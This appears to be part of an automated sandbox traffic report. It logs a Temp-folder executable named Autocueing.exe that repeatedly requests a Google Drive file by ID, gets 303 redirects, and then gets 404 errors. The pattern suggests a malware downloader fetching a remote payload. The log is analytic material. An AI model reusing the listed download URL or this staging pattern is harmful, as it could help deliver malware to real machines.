                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-AqnC-xDGvCrLQy2D-0ZnPQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    13192.168.2.649996142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:15 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:16 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgQLhufAgrAgdh-N9Wh2MKIScDVLvm2cJXzcEsmvz2wxwZNpbMwxPKNQ4cZDpykWxMyn
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:16 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-KQ91EmzVDghX3w5eyMWlgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:16 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 76 36 5a 5a 73 55 47 56 4f 51 53 73 61 65 57 4c 56 69 51 46 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mv6ZZsUGVOQSsaeWLViQFQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    14192.168.2.649997142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:17 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:17 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:17 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-pFtz4nqIgYmgAnKmT-p8ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    15192.168.2.649998142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:18 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:18 UTC1851INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgSzUbDwmVRmlsWZHCApqs9_hTockWhjWVTadlBHnKY69C1wFBCR8nFpIct8O-cEdvP3cwsZ7RI
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:18 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-uzqnJ5y-7flUkm1Axl61Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:18 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 4d 4e 34 6e 73 6a 4d 36 48 4e 41 56 34 61 39 37 33 4f 5a 5f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-MN4nsjM6HNAV4a973OZ_w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    16192.168.2.649999142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:19 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:19 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:19 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-zIGV7XKh8f2Ck4gusevTsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    17192.168.2.650000142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:20 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:21 UTC1851INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgQ2jgYZZqhKKnKkcykpTY4WaDb3A1Mwsz8d3yNeE2WzjZZqX2o4zuRGTK8vmcr_izKe9vVLkX0
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:21 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-KVjUz6AGEt_5sIzzr-XOBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:21 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 6c 52 59 65 42 4c 51 69 4a 51 71 6c 4a 6c 6a 34 6d 70 70 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="slRYeBLQiJQqlJlj4mppmA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    18192.168.2.650001142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:22 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:22 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:22 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-_87piI0JTVBG7vluM053yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    19192.168.2.650002142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:23 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:23 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC7lMppWOlM3xo9lfPJ7DhxAMiouHuPfxrl4hPw89Hq-1HfFsTsdnPwkHmkbJabjVW1p
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:23 GMT
